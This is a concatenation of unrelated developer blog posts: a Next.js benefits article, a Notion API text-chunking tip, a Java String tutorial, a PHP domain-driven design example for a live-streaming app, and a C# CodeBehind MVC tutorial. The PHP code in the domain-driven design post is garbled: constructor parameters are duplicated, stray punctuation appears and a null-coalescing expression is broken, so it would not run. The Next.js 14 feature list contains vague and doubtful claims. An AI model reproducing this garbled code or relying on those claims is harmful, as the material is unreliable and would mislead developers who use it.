If you want to build a complex and demanding application, React development nature of Next.js allows for saving a lot of time. Developers especially favour features like:
- **Zero Config** — Next allows you to focus on the business logic of your application instead of the application logic. And to help you, it provides automatic compilation and bundling. In other words, Next is optimized for production right from the start.
- **Incremental Static Regeneration** — it allows you to update the pages by re-rendering them in the background as traffic comes in. So in other words, static content can become dynamic.
- **A hybrid of server-side rendering SSR and static site generation SSG** — prerender pages at build time or request time in a single project.
- **TypeScript support** — automatic TypeScript configuration and compilation.
- **Fast Refresh** — fast, live-editing experience — edits made on React components are live within seconds. It works analogically to Hot Module Replacement (HMR).
- **CSS parsers** — the possibility to import CSS files from a JavaScript file. New parses improved the handling of CSS.
- **Built-in Image Component and Automatic Image Optimization** — this feature automatically optimizes images.
- **Automatic code splitting** — automatically reduces the size of the page by splitting the code and serving components only when needed. Modules can be automatically imported too, thanks to the dynamic import option.
- **Data fetching** — this option allows rendering the content in different ways, accordingly to the app’s use case. It can be done by pre-rendering with server-side rendering SSR or static site generation and by updating or creating content with ISR.
**Release of Next.js 14: even more promising future**
The list of Next.js benefits is growing with every release. In October 2023, Next.js 14 was introduced, together with a bunch of new features. The most important among them are:

1. **Improved Image Component**: Next.js 14 introduces enhancements to the Image component, making it even more efficient and versatile for handling images in web applications. With optimizations for performance and accessibility, developers can seamlessly integrate high-quality images while maintaining a fast and responsive user experience.
2. **Incremental Static Regeneration (ISR) Enhancements**: Building upon the ISR feature introduced in previous versions, Next.js 14 further refines and expands its capabilities. With improved support for dynamic data fetching and caching strategies, developers can leverage ISR to generate and update static pages with minimal effort, ensuring up-to-date content delivery while maximizing performance.
3. **Enhanced TypeScript Support**: Next.js continues to prioritize TypeScript support, with version 14 delivering even more robust typings and tooling for TypeScript users. This includes better integration with popular TypeScript libraries and improved error handling, enabling developers to write safer and more maintainable code with confidence.
4. **Streamlined API Routes**: Next.js 14 introduces optimizations to API routes, simplifying the process of building backend functionality within Next.js applications. With enhanced routing capabilities and improved middleware support, developers can create powerful APIs more efficiently, facilitating seamless communication between client-side and server-side logic.
5. **Advanced Internationalization (i18n) Support**: Next.js 14 expands its i18n capabilities with new features and enhancements tailored for building multilingual applications. With built-in support for locale-specific routing, content translation, and date formatting, developers can easily create immersive user experiences for global audiences while maintaining code simplicity and clarity.
6. **Optimized Build Performance**: Building upon previous optimizations, Next.js 14 introduces further improvements to build performance, reducing build times and enhancing developer productivity. Through enhancements to the build pipeline and caching mechanisms, developers can iterate more quickly and deploy changes with confidence, ensuring a smooth development experience from start to finish.
7. **Enhanced Developer Experience**: Next.js 14 focuses on enhancing the overall developer experience with improvements to tooling, documentation, and community resources. With updated documentation, interactive examples, and comprehensive guides, developers can onboard quickly and leverage Next.js effectively for their projects, regardless of experience level.
8. **Expanded Ecosystem Integrations**: Next.js 14 strengthens its integration with popular frameworks, libraries, and services within the JavaScript ecosystem. From seamless integration with React Suspense to enhanced compatibility with GraphQL APIs and headless CMS platforms, developers have access to a rich ecosystem of tools and resources to streamline development workflows and build cutting-edge web applications.
9. **Improved Accessibility**: Next.js 14 prioritizes accessibility by providing developers with tools and best practices to ensure that their applications are inclusive and usable by all users. With enhanced accessibility auditing tools, automatic aria-label generation, and built-in support for keyboard navigation, developers can create accessible web experiences with ease, meeting the highest standards of accessibility compliance.
10. **Future-ready Architecture**: Next.js 14 lays the foundation for future innovations in web development with a forward-thinking architecture and design principles. By embracing emerging technologies, standards, and best practices, Next.js empowers developers to build modern, scalable, and resilient web applications that are ready for the challenges of tomorrow.
Next.js 14 represents a significant milestone in the evolution of the framework, offering developers a comprehensive toolkit for building modern web applications with speed, efficiency, and confidence. With its rich feature set, robust performance optimizations, and commitment to developer experience, Next.js continues to solidify its position as a leading choice for JavaScript developers worldwide.
To learn more about the new Next.js, visit the [Next.js official website](https://nextjs.org/blog).
**Cons of using Next.js**
The number of Next benefits is huge and clearly outweighs its cons. However, let’s write them down to be as objective as it’s possible.
- **Development and management** — the flexibility, given by Next, has its cost — continuous management. To make all desired changes properly, you will need a dedicated person with proper knowledge. The good news is that this person doesn’t have to be a developer.
- **Ongoing cost** — since Next.js does not provide many built-in front pages, you have to create your own front-end, which will require changes from time to time. It means that you will have to pay a frontend developer to get the job done.
- **Lack of built-in state manager** — so if you need a state manager in your app, you have to add Redux, MobX or something else.
- **Low on plug-ins** — you cannot use much of easy-to-adapt plugins.
EXAMPLES OF NEXT.JS WEBSITES
Here are just three of [the great examples of websites build in Next.js.](https://pagepro.co/blog/nextjs-websites-examples/)
You can also check out [their official showcase](https://nextjs.org/showcase) for even more inspiration.

[https://ferrari.com](https://ferrari.com)

[https://m.twitch.tv](https://m.twitch.tv)

[https://nike.com/help](https://nike.com/help)
**SUMMARY**
It doesn’t matter if you are planning to build a huge and demanding app to serve millions of users, nor if you are a growing web shop on Shopify. In both cases, you can use the advantages of modern web technology to **make your business more efficient online.**
Uplift your page speed, SEO, and UX, and remember that technologies such as Next.js are making the web a better, cleaner, and more user-centric place. And that will always be favourable, not only to Google but, most importantly, to users.
| basimghouri |
1,878,579 | How to unlock the limitations of Notion | Notion rich_text limitations - node client Notion has undoubtedly gained popularity as a... | 27,625 | 2024-06-05T23:31:02 | https://www.johnatanortiz.tech/blog/how-to-unlock-the-limitations-of-notion | # Notion rich_text limitations - node client
Notion has undoubtedly gained popularity as a versatile productivity and organization platform. Its ability to create documents, databases, boards, and more, all in one place, has attracted a wide range of users, from students to business professionals. However, like any tool, Notion also has its limitations, especially when it comes to its API and handling rich_text.
### What is rich_text in Notion?
Before diving into the limitations, it's essential to understand what rich_text in Notion is exactly. In simple terms, rich_text refers to the rich text formatting that can be used within Notion. This includes styles such as bold, italic, strikethrough, numbered and bulleted lists, as well as links and mentions to other pages.
### What are the principal limitation
One of the primary limitations of the Notion API is its restriction on the maximum number of characters that can be processed in a single request. Presently, the Notion API accepts a maximum of 2000 characters per request. This constraint poses a significant challenge for developers working with large bodies of text or intricate data structures within the Notion platform.
| Property value type | Inner property | Size limit |
| --- | --- | --- |
| https://developers.notion.com/reference/rich-text | text.content | 2000 characters |
| https://developers.notion.com/reference/rich-text | text.link.url | 2000 characters |
| https://developers.notion.com/reference/rich-text | equation.expression | 1000 characters |
### Solution for mitigate the notion API limits
The most effective solution for mitigating the limitations imposed by the Notion API's character restriction is to segment the content into smaller chunks of 2000 characters or less. By breaking down the text content into manageable chunks.
**Example:**
- This is the typical way a page would be added:
```jsx
const page = await notion.pages.create({
parent: { database_id: databaseId },
properties: {
nameOfColumn: {
rich_text: [
{
type: 'text',
text: {
content: 'This is a long text...'
}
}
]
},
}
});
```
- This is the way that we need to insert the page with the long text inside
```jsx
function splitTextIntoChunks(text: string, chunkSize: number) {
const chunks = [];
for (let i = 0; i < text.length; i += chunkSize) {
chunks.push(text.slice(i, i + chunkSize));
}
return chunks;
}
const chunks = splitTextIntoChunks('This is a long text...', 2000);
const page = await notion.pages.create({
parent: { database_id: databaseId },
properties: {
nameOfColumn: {
rich_text: chunks.map(chunk => ({
type: 'text',
text: {
content: chunk
}
}))
},
}
});
```
Implementing this approach ensures efficient data transmission within the constraints of the Notion API, facilitating seamless integration and manipulation of content. | johnatan_stevenortizsal | |
1,878,578 | The String Class | A String object is immutable: Its content cannot be changed once the string is created. You know... | 0 | 2024-06-05T23:30:36 | https://dev.to/paulike/the-string-class-17o7 | java, programming, learning, beginners | A **String** object is immutable: Its content cannot be changed once the string is created. You know strings are objects. You can invoke the **charAt(index)** method to obtain a character at the specified index from a string, the **length()** method to return the size of a string, the **substring** method to return a substring in a string, and the **indexOf** and **lastIndexOf** methods to return the first or last index of a matching character or a substring. We will take a closer look at strings in this section.
The **String** class has 13 constructors and more than 40 methods for manipulating strings. Not only is it very useful in programming, but it is also a good example for learning classes and objects.
## Constructing a String
You can create a string object from a string literal or from an array of characters. To create a string from a string literal, use the syntax:
`String newString = new String(stringLiteral);`
The argument **stringLiteral** is a sequence of characters enclosed inside double quotes. The following statement creates a **String** object **message** for the string literal **"Welcome to Java"**:
`String message = new String("Welcome to Java");`
Java treats a string literal as a **String** object. Thus, the following statement is valid:
`String message = "Welcome to Java";
`
You can also create a string from an array of characters. For example, the following statements create the string **"Good Day"**:
`char[] charArray = {'G', 'o', 'o', 'd', ' ', 'D', 'a', 'y'};
String message = new String(charArray);`
A **String** variable holds a reference to a **String** object that stores a string value. Strictly speaking, the terms **String** _variable_, **String** _object_, and _string value_ are different, but most of the time the distinctions between them can be ignored. For simplicity, the term _string_ will often be used to refer to **String** variable, **String** object, and string value.
## Immutable Strings and Interned Strings
A **String** object is immutable; its contents cannot be changed. Does the following code change the contents of the string?
`String s = "Java";
s = "HTML";`
The answer is no. The first statement creates a **String** object with the content **"Java"** and assigns its reference to **s**. The second statement creates a new **String** object with the content **"HTML"** and assigns its reference to **s**. The first **String** object still exists after the assignment, but it can no longer be accessed, because variable **s** now points to the new object, as shown in Figure below.

Because strings are immutable and are ubiquitous in programming, the JVM uses a unique instance for string literals with the same character sequence in order to improve efficiency and save memory. Such an instance is called an _interned string_. For example, the following statements:
`String s1 = "Welcome to Java";
String s2 = new String("Welcome to Java");
String s3 = "Welcome to Java";
System.out.println("s1 == s2 is " + (s1 == s2));
System.out.println("s1 == s3 is " + (s1 == s3));`

display
`s1 == s2 is false
s1 == s3 is true`
In the preceding statements, **s1** and **s3** refer to the same interned string—**"Welcome to Java"**—so **s1 == s3** is **true**. However, **s1 == s2** is **false**, because **s1** and **s2** are two different string objects, even though they have the same contents.
## Replacing and Splitting Strings
The **String** class provides the methods for replacing and splitting strings, as shown in Figure below.

Once a string is created, its contents cannot be changed. The methods **replace**, **replaceFirst**, and **replaceAll** return a new string derived from the original string (without changing the original string!). Several versions of the **replace** methods are provided to replace a character or a substring in the string with a new character or a new substring.
For example,
**"Welcome".replace('e', 'A')** returns a new string, **WAlcomA**.
**"Welcome".replaceFirst("e", "AB")** returns a new string, **WABlcome**.
**"Welcome".replace("e", "AB")** returns a new string, **WABlcomAB**.
**"Welcome".replace("el", "AB")** returns a new string, **WABcome**.
The **split** method can be used to extract tokens from a string with the specified delimiters. For example, the following code
`String[] tokens = "Java#HTML#Perl".split("#");
for (int i = 0; i < tokens.length; i++)
System.out.print(tokens[i] + " ");`
displays
`Java HTML Perl`
## Matching, Replacing and Splitting by Patterns
Often you will need to write code that validates user input, such as to check whether the input is a number, a string with all lowercase letters, or a Social Security number. How do you write this type of code? A simple and effective way to accomplish this task is to use the regular expression.
A _regular expression_ (abbreviated regex) is a string that describes a pattern for matching a set of strings. You can match, replace, or split a string by specifying a pattern. This is an extremely useful and powerful feature.
Let us begin with the **matches** method in the **String** class. At first glance, the **matches** method is very similar to the **equals** method. For example, the following two statements both evaluate to **true**.
`"Java".matches("Java");
"Java".equals("Java");`
However, the **matches** method is more powerful. It can match not only a fixed string, but also a set of strings that follow a pattern. For example, the following statements all evaluate to **true**:
`"Java is fun".matches("Java.*")
"Java is cool".matches("Java.*")
"Java is powerful".matches("Java.*")`
**Java.*** in the preceding statements is a regular expression. It describes a string pattern that begins with Java followed by _any_ zero or more characters. Here, the substring matches any zero or more characters.
The following statement evaluates to **true**.
`"440-02-4534".matches("\\d{3}-\\d{2}-\\d{4}")`
Here **\\d** represents a single digit, and **\\d{3}** represents three digits.
The **replaceAll**, **replaceFirst**, and **split** methods can be used with a regular expression. For example, the following statement returns a new string that replaces **$**, **+**, or **#** in **a+b$#c** with the string **NNN**.
`String s = "a+b$#c".replaceAll("[$+#]", "NNN");
System.out.println(s);`
Here the regular expression **[$+#]** specifies a pattern that matches **$**, **+**, or **#**. So, the output is **aNNNbNNNNNNc**.
The following statement splits the string into an array of strings delimited by punctuation marks.
`String[] tokens = "Java,C?C#,C++".split("[.,:;?]");
for (int i = 0; i < tokens.length; i++)
System.out.println(tokens[i]);`
In this example, the regular expression **[.,:;?]** specifies a pattern that matches **.**, **,**, **:**, **;**, or **?**. Each of these characters is a delimiter for splitting the string. Thus, the string is split into **Java**, **C**, **C#**, and **C++**, which are stored in array **tokens**.
Regular expression patterns are complex for beginning students to understand. For this reason, simple patterns are introduced in this section.
## Conversion between Strings and Arrays
Strings are not arrays, but a string can be converted into an array, and vice versa. To convert a string into an array of characters, use the **toCharArray** method. For example, the following statement converts the string **Java** to an array.
`char[] chars = "Java".toCharArray();`
Thus, **chars[0]** is **J**, **chars[1]** is **a**, **chars[2]** is **v**, and **chars[3]** is **a**.
You can also use the **getChars(int srcBegin, int srcEnd, char[] dst,
int dstBegin)** method to copy a substring of the string from index **srcBegin** to index **srcEnd-1** into a character array **dst** starting from index **dstBegin**. For example, the following code copies a substring **"3720"** in **"CS3720"** from index **2** to index **6-1** into the character array **dst** starting from index **4**.
`char[] dst = {'J', 'A', 'V', 'A', '1', '3', '0', '1'};
"CS3720".getChars(2, 6, dst, 4);`
Thus, **dst** becomes **{'J', 'A', 'V', 'A', '3', '7', '2', '0'}**.
To convert an array of characters into a string, use the **String(char[])** constructor or the **valueOf(char[])** method. For example, the following statement constructs a string from an array using the **String** constructor.
`String str = new String(new char[]{'J', 'a', 'v', 'a'});`
The next statement constructs a string from an array using the **valueOf** method.
`String str = String.valueOf(new char[]{'J', 'a', 'v', 'a'});`
## Converting Characters and Numeric Values to Strings
Recall that you can use **Double.parseDouble(str)** or **Integer.parseInt(str)** to convert a string to a **double** value or an **int** value and you can convert a character or a number into a string by using the string concatenating operator. Another way of converting a number into a string is to use the overloaded static **valueOf** method. This method can also be used to convert a character or an array of characters into a string, as shown in Figure below.

For example, to convert a **double** value **5.44** to a string, use **String.valueOf(5.44)**. The return value is a string consisting of the characters **'5'**, **'.'**, **'4'**, and **'4'**.
## Formatting Strings
The **String** class contains the static **format** method to return a formatted string. The syntax to invoke this method is:
`String.format(format, item1, item2, ..., itemk)`
This method is similar to the **printf** method except that the **format** method returns a formatted string, whereas the **printf** method displays a formatted string. For example,
`String s = String.format("%7.2f%6d%-4s", 45.556, 14, "AB");
System.out.println(s);`
displays
xx45.56xxxx14ABxx
Note that
`System.out.printf(format, item1, item2, ..., itemk);`
is equivalent to
`System.out.print(
String.format(format, item1, item2, ..., itemk));`
where the (x) denotes a blank space. | paulike |
1,872,855 | Domain Driven Design (DDD) Practice: Live Streaming App Example | Domain Driven Design (DDD) Practice: Live Streaming App Example Introduction In... | 0 | 2024-06-05T23:29:38 | https://dev.to/ma2mori/domain-driven-design-ddd-practice-live-streaming-app-example-3dih | ddd, php | ### Domain Driven Design (DDD) Practice: Live Streaming App Example
#### Introduction
In [previous article](https://dev.to/ma2mori/introduction-to-domain-driven-design-ddd-basic-concepts-and-rudiments-of-practice-5042), we learned the basic concepts of Domain Driven Design (DDD). In this article, we will introduce a concrete practical example using a “live-streaming application” as a subject.
### Overview of a live-streaming application
A live-streaming app is a platform where users distribute content in real-time and other users watch it. It has the following features
- Viewing users can also be delivery users
- Viewers can provide feedback to the distributor in the form of free and paid reactions
Therefore, the main modeling considerations are
- User management
- Distribution Management
- Reaction management
In practice, we will work with domain experts to work out the details.
### Domain Modeling
First, we will define the main entities, value objects, aggregates, services, and repositories for the live distribution application.
#### Entity

- **User**
- Attributes: user id, name, profile information, follower list.
- **distribution**
- Attributes: distribution ID, distributor (user), start time, end time, viewer list
#### value object

- **Profile Information**
- Attributes: age, gender, self, etc.
- **Comment**
- Attributes: comment content, poster (user), time posted
- **Reaction**
- Attributes: reaction type (free, paid), reaction content, reaction time
#### aggregation

- **Distribution Aggregate**
- Aggregation of related entities (comments, reactions) around a delivery
#### Services

- **Distribution Management Service**
- Start and end distribution, manage viewers, aggregate reactions.
#### repository

- **User Repository**
- Retrieve and save user information.
- **Distribution Repository**
- Retrieve and store distribution information
### Use Cases
In this section, we will take a practical look at the elements of DDD through a simple use case of a live-streaming application. The following example is in PHP.
#### Use Case: Start and End of Delivery
1. **Start distribution**
- When a user starts a delivery, a new delivery entity is created.
```php
<?php
class ProfileInfo {
public function __construct(
private int $age, private string $gender, private string $age, private string $gender
private string $gender, private string $bio
private string $bio
) {}
// getter methods
}
class User {
private array $followers; }
public function __construct(
private string $userId, private string $name, private string $followers
private string $name, private
private ProfileInfo $profileInfo, private
array $followers = [] )
) {
$this->followers = array_map(fn($follower) => new UserId($follower), $followers); }
}
// getter methods
}
class UserId {
public function __construct(private string $id) {}
public function __toString(): string {
return $this->id; }
}
}
class LiveStream {
private DateTime $startTime;
private ?DateTime $endTime; }
private array $viewers; private
public function __construct(
private string $streamId, private
private User $streamer
) {
$this->startTime = new DateTime();
$this->endTime = null;
$this->viewers = []; }
}
public function endStream(): void {
$this->endTime = new DateTime(); }
}
public function addViewer(User $viewer): void {
$this->viewers[] = $viewer; }
}
// other methods...
}
```
2. **End of delivery**
- When the delivery is finished, the end time of the delivery entity is set and the required data is saved.
```php
<?php
class LiveStreamRepository {
private array $liveStreams = [];
public function save(LiveStream $liveStream): void {
$this->liveStreams[$liveStream->streamId] = $liveStream;
}
public function findById(string $streamId): ?LiveStream {
return $this->liveStreams[$streamId] ? null;?
}
}
class LiveStreamService {
public function __construct(private LiveStreamRepository $repository) {}
public function startStream(string $streamId, User $streamer): void {
$liveStream = new LiveStream($streamId, $streamer);
$this->repository->save($liveStream); }
}
public function endStream(string $streamId): void {
$liveStream = $this->repository->findById($streamId);
if ($liveStream) {
$liveStream->endStream();
$this->repository->save($liveStream); }
}
}
}
```
#### Use Case: Sending Reactions
1. **Send Free Reactions**
- This is a use case where a user sends a free reaction.
```php
<?php
class Reaction {
private DateTime $time;.
public function __construct(
private string $type, private string $content
private string $type, private string $content
) {
$this->time = new DateTime(); }
}
// getter methods
}
class LiveStream {
private array $reactions = [];
public function addReaction(Reaction $reaction): void {
$this->reactions[] = $reaction; }
}
// other methods...
}
```
2. **Sending a Paid Reaction**
- Use case where a user sends a paid reaction.
```php
<?php
class PaidReaction extends Reaction {
public function __construct(
string $content,.
private float $amount
) {
parent::__construct('paid', $content);
}
// getter methods
}
```
#### domain-model-diagram

### Benefits of the DDD Approach
The benefits of this approach are as follows.
- **Clear separation of business logic**.
- Centralizing the business logic in the domain model improves code readability and maintainability.
- **High level of abstraction**.
- Abstraction of complex domains into concepts such as entities, value objects, services, and repositories simplifies and strengthens the design.
- **Ensures consistency**.
- Ensures consistency throughout the system by guaranteeing data integrity within the boundaries of the aggregation.
- **Ease of Testing**.
- Clearly defined domain model facilitates unit and integration testing.
- **Extensibility**.
- Models can be easily extended and modified to meet changing business requirements.
### Conclusion
This article introduced the basic concepts and practices of Domain Driven Design (DDD) using a live-streaming application as an example; using the DDD approach, you will be able to effectively manage complex business logic. I look forward to continuing to learn more in order to create more valuable software. | ma2mori |
1,877,900 | Learning MVC Once And For All | In this training, we teach the concept of Controller in CodeBehind Framework. Why do some... | 27,500 | 2024-06-05T23:12:28 | https://dev.to/elanatframework/learning-mvc-once-and-for-all-2d9d | tutorial, dotnet, beginners, backend | In this training, we teach the concept of Controller in CodeBehind Framework.
## Why do some people not understand the concept of MVC?
Most back-end frameworks require Controller configuration in Route to run. Concepts like routing or mapping are very confusing. Usually, before learning MVC, beginners are familiar with a script such as PHP or Python, and they easily understand the physical path of the script files in the root and their corresponding path in the url; but the concept of Route becomes challenging for them for the first time, because in this type of back-end frameworks, there is no physical route.
As we said before, in the MVC architecture in CodeBehind, the names of the Controller and Model classes are first determined as the attributes of the page in the View, and the requests reach the View path, and then a new instance of the Controller and Model classes is created. So if you have configured the CodeBehind framework by default, there is no need to configure the Controller in the Route.
## How to teach MVC?
In the MVC architecture of the CodeBehind framework, there is no need to follow the MVC pattern, and each part of the application can be created as only View, Model-View, etc. In this architecture, you can easily create and execute a single View, then you can add and execute a Model to it, and finally, you can add a Controller to it. We recommend to instructors that if you are teaching students the concept of MVC for the first time, use the CodeBehind framework as an example. First, teach the concept of View, then teach the Model-View pattern in the CodeBehind framework, and then teach the Controller.
## Why do we need a Controller?
The Controller acts as an intermediary between the user interface and the database. Controller is responsible for managing user input and processing requests. Controllers play an important role in web programming by helping to organize and manage the flow of data and requests in an application.
The Controller has a high power to respond to requests and provides the response according to the request. Controller can call a View for each request and fill the values of that View with Model.
## MVC example in CodeBehind
Here is an example of a simple MVC application in CodeBehind Framework that displays information about a book:
View File: Book.aspx
```html
@page
@controller BookController
@model {BookModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Title</title>
</head>
<body>
<h1>@model.Title</h1>
<p>Author: @model.Author</p>
<p>Publication Date: @model.PublicationDate</p>
</body>
</html>
```
Model Class: BookModel.cs
```csharp
public class BookModel
{
public string Title { get; set; }
public string Author { get; set; }
public string PublicationDate { get; set; }
}
```
Controller Class: BookController.cs
```csharp
using CodeBehind;
public partial class BookController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
BookModel model = new BookModel();
model.Title = "The Smiling, Proud Wanderer";
model.Author = "Jin Yong (Louis Cha)";
model.PublicationDate = "1967";
View(model);
}
}
```
Screenshot

The response that is sent to the browser is according to the codes below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>The Smiling, Proud Wanderer</title>
</head>
<body>
<h1>The Smiling, Proud Wanderer</h1>
<p>Author: Jin Yong (Louis Cha)</p>
<p>Publication Date: 1967</p>
</body>
</html>
```
In this example, we have a `Book.aspx` View that displays the title, author, and publication date of a book. The View is bound to a `BookModel` class that contains the properties for these values. The `BookController` class is responsible for loading the data and passing it to the View.
To run this example, you need to create a new ASP.NET Core project and add the CodeBehind NuGet package to your project. Then, you can create a new folder called Views and add the Book.aspx file to it. Finally, you can run the project and navigate to the `/Book.aspx` URL to see the book information displayed.
Note that this is just a simple example, and you can customize the View and Controller to fit your specific needs.
## CodeBehindController abstract class
It is required to add `CodeBehindController` abstract class to Controller class.
We have explained the properties of `CodeBehindModel` abstract class in the previous training. The `CodeBehindController` abstract class is also somewhat similar to the `CodeBehindModel` abstract class of the Model, but it has more features. Because we want this article to be of high quality regardless of the previous articles, we again explain the same classes and attributes in these two classes.
**Create `PageLoad` method**
You can use the `PageLoad` method in the Controller class. The first time the class is called, the `PageLoad` method is executed.
**View**
View is method and can be called in three modes.
Call Model
`View(MyModel)`
The above method contains as an input argument an instance created from a Model class named MyModel. When we call the View method in this way, the values of the Model class are initialized in the default View path.
Call View
`View("/MyNewView.aspx")`
According to the code above, this type of call is actually a redirect. In this case, the default View is ignored and a new View path is requested. The new View can also include Controller and Model.
Call View with Model
`View("/MyNewView.aspx", MyModel)`
In this call, the sample values created from a Model class are set in the new View.
**ViewData**
ViewData is a name and value instance of the `NameValueCollection` class that is used to transfer data from the Controller to the View.
You can set ViewData in the Controller class as follows.
`ViewData.Add("title", "Hello World!");`
Then you can call ViewData as shown below.
`<title>@ViewData.GetValue("title")</title>`
**Section**
Section is a attribute that applies to aspx pages. Section is a feature whose activation makes all paths after the aspx path refer to the current aspx path.
Section in Model takes its value only when you have activated Section in your View. In the next trainings, we will teach Section completely.
Example:
Active Section in View
```html
@page
+@section
```
If you enable Section in the `/page/about.aspx` path, any path added after the current path will be considered a Section and the executable file in the `/page/about.aspx` path will still be executed.
Example:
`/page/about.aspx/section1/section2/.../sectionN`
If you enable the Section in an executable file called `Default.aspx`, you will still have access to the default path.
Example:
`/page/about/Default.aspx/section1/section2/.../sectionN`
or
`/page/about/section1/section2/.../sectionN`
**CallerViewPath**
The View path that requests the current Controller.
Example:
If the request path is the following value:
`example.com/page/about/OtherInfo.aspx`
According to the above value, the following string is stored in CallerViewPath:
`/page/about/OtherInfo.aspx`
**CallerViewDirectoryPath**
The View directory path that requests the current Controller.
Example:
If the request path is the following value:
`example.com/page/about/OtherInfo.aspx`
According to the above value, the following string is stored in CallerViewDirectoryPath:
`/page/about`
**Download**
Download is a method that takes the file path as an input argument and makes the file available for download in the View path.
Example:
```csharp
Download("/upload/book/my_book.pdf");
```
**Write**
This method adds string values to the beginning of the View page
Example:
According to the previous example, if you call the following method in the Controller class, the string `New written text` will be added at the beginning of the View response.
`Write("New written text")`
The response that is sent to the browser is according to the codes below.
HTML result
```html
New written text
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>The Smiling, Proud Wanderer</title>
</head>
<body>
<h1>The Smiling, Proud Wanderer</h1>
<p>Author: Jin Yong (Louis Cha)</p>
<p>Publication Date: 1967</p>
</body>
</html>
```
**IgnoreViewAndModel**
This is a boolean attribute, enabling it will cause View and Model to be ignored.
Example:
```csharp
using CodeBehind;
public partial class MyController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
IgnoreViewAndModel = true;
Write("<b>View values cleared</b>");
}
}
```
The response that is sent to the browser is according to the codes below.
HTML result
```
<b>View values cleared</b>
```
## Using CodeBehindConstructor method
You can use `CodeBehindConstructor` method instead of `PageLoad` method. We created the same example as before using the `CodeBehindConstructor` method.
View File: Book.aspx
```html
@page
@controller BookController()
@model {BookModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Title</title>
</head>
<body>
<h1>@model.Title</h1>
<p>Author: @model.Author</p>
<p>Publication Date: @model.PublicationDate</p>
</body>
</html>
```
The CodeBehind constructor is activated when you use open `(` and close `)` parentheses in front of the Controller class name in the View.
Controller Class: BookController.cs
```csharp
using CodeBehind;
public partial class BookController : CodeBehindController
{
public void CodeBehindConstructor()
{
BookModel model = new BookModel();
model.Title = "The Smiling, Proud Wanderer";
model.Author = "Jin Yong (Louis Cha)";
model.PublicationDate = "1967";
View(model);
}
}
```
## MVC in Visual Studio Code
In the Visual Studio Code project, we create a new View named `Monitor.aspx`.
In the Explorer section, by right-clicking on `wwwroot` directory, we select the `New File` option and create a new file called `Monitor.aspx`.
Then we add the following codes inside the `Monitor.aspx` file.
```html
@page
@controller MonitorController
@model {MonitorModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Name</title>
</head>
<body>
<h1>@model.Name</h1>
<p>Manufacturer: @model.Manufacturer</p>
<p>Model Number: @model.ModelNumber</p>
<p>Resolution: @model.Resolution</p>
<p>Refresh Rate: @model.RefreshRate</p>
<p>Price: @model.Price USD</p>
</body>
</html>
```
Then we create a Model named `MonitorModel.cs`.
In the Explorer section, by right-clicking on an empty space in Explorer, we select the `New File` option and create a new file called `MonitorModel.cs`.
Then we add the following codes inside the `MonitorModel.cs` file.
```csharp
public class MonitorModel
{
public string Name { get; set; }
public string Manufacturer { get; set; }
public string ModelNumber { get; set; }
public string Resolution { get; set; }
public int RefreshRate { get; set; }
public decimal Price { get; set; }
}
```
Finally we create a Controller named `MonitorController.cs`.
In the Explorer section, by right-clicking on an empty space in Explorer, we select the `New File` option and create a new file called `MonitorController.cs`.
Then we add the following codes inside the `MonitorController.cs` file.
```csharp
using CodeBehind;
public partial class MonitorController : CodeBehindController
{
public void PageLoad(HttpContext context)
{
MonitorModel model = new MonitorModel();
model.Name = "ASUS VG278Q";
model.Manufacturer = "ASUS";
model.ModelNumber = "VG278Q";
model.Resolution = "1920x1080";
model.RefreshRate = 144;
model.Price = 250.00m;
View(model);
}
}
```
We run the project (F5 key). After running the project, You need to add the string `/Monitor.aspx` to the URL.
If you enter the above path in the browser, you will see the following image in the browser.
Screenshot

The response that is sent to the browser is according to the codes below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>ASUS VG278Q</title>
</head>
<body>
<h1>ASUS VG278Q</h1>
<p>Manufacturer: ASUS</p>
<p>Model Number: VG278Q</p>
<p>Resolution: 1920x1080</p>
<p>Refresh Rate: 144</p>
<p>Price: 250.00 USD</p>
</body>
</html>
```
In this example, we have a `Monitor.aspx` View that displays the name, manufacturer, model number, resolution, refresh rate, and price of a monitor. The View is bound to a `MonitorModel` class that contains the properties for these values. The `MonitorController` class is responsible for loading the data and passing it to the View.
## Add a new View
For you to understand the concept of MVC, we will add a new View and only slightly change its HTML tags.
In the Visual Studio Code project, we create a new View named `Monitor2.aspx`.
In the Explorer section, by right-clicking on `wwwroot` directory, we select the `New File` option and create a new file called `Monitor2.aspx`.
Then we add the following codes inside the `Monitor2.aspx` file.
```html
@page
@controller MonitorController
@model {MonitorModel}
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Name</title>
</head>
<body>
<h1 style="color: red;">@model.Name</h1>
<b style="color: green;">Manufacturer: @model.Manufacturer</b>
<b style="color: blue;">Model Number: @model.ModelNumber</b>
<b style="color: gray;">Resolution: @model.Resolution</b>
<b style="color: brown;">Refresh Rate: @model.RefreshRate</b>
<b style="color: pink;">Price: @model.Price USD</b>
</body>
</html>
```
We run the project (F5 key). After running the project, You need to add the string `/Monitor2.aspx` to the URL.
If you enter the above path in the browser, you will see the following image in the browser.
Screenshot

The response that is sent to the browser is according to the codes below.
HTML result
```html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>ASUS VG278Q</title>
</head>
<body>
<h1 style="color: red;">ASUS VG278Q</h1>
<b style="color: green;">Manufacturer: ASUS</b>
<b style="color: blue;">Model Number: VG278Q</b>
<b style="color: gray;">Resolution: 1920x1080</b>
<b style="color: brown;">Refresh Rate: 144</b>
<b style="color: pink;">Price: 250.00 USD</b>
</body>
</html>
```
## Change View in Controller
We want to call the new View in the Controller class.
First, we delete the Controller in the `Monitor2.aspx` file.
```diff
@page
-@controller MonitorController
@model {MonitorModel}
+@break
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>@model.Name</title>
</head>
<body>
<h1 style="color: red;">@model.Name</h1>
<b style="color: green;">Manufacturer: @model.Manufacturer</b>
<b style="color: blue;">Model Number: @model.ModelNumber</b>
<b style="color: gray;">Resolution: @model.Resolution</b>
<b style="color: brown;">Refresh Rate: @model.RefreshRate</b>
<b style="color: pink;">Price: @model.Price USD</b>
</body>
</html>
```
